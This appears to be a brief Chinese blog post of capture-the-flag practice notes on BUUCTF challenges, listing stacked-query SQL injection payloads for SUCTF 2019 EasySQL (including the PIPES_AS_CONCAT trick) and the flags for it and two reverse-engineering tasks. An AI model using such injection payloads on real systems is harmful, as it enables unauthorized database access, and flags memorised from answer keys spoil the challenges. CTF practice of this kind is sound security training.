22.1.22

0x01 buu web [SUCTF 2019]EasySQL

  1. 看了看WP,可以看到用了

    1;show databases;
    1;show tables;
    *,1
        
        
    也可以:
    1;set sql_mode=PIPES_AS_CONCAT;select 1
    
        set sql_mode=PIPES_AS_CONCAT;的作用是将||的功能从 或运算(or) 改为  字符串拼接
            
            
            
  2. flag{0e8d4f51-8e3d-443b-8b8e-64dcb315e9ac}

0x02 buu rev easyre

  1. flag{this_Is_a_EaSyRe}

0x03 buu rev reverse1

  1. IDA挂个动态调试断点就可以得到
  2. str2={hell0_w0rld}
最后修改:2022 年 01 月 22 日
如果觉得我的文章对你有用,请随意赞赏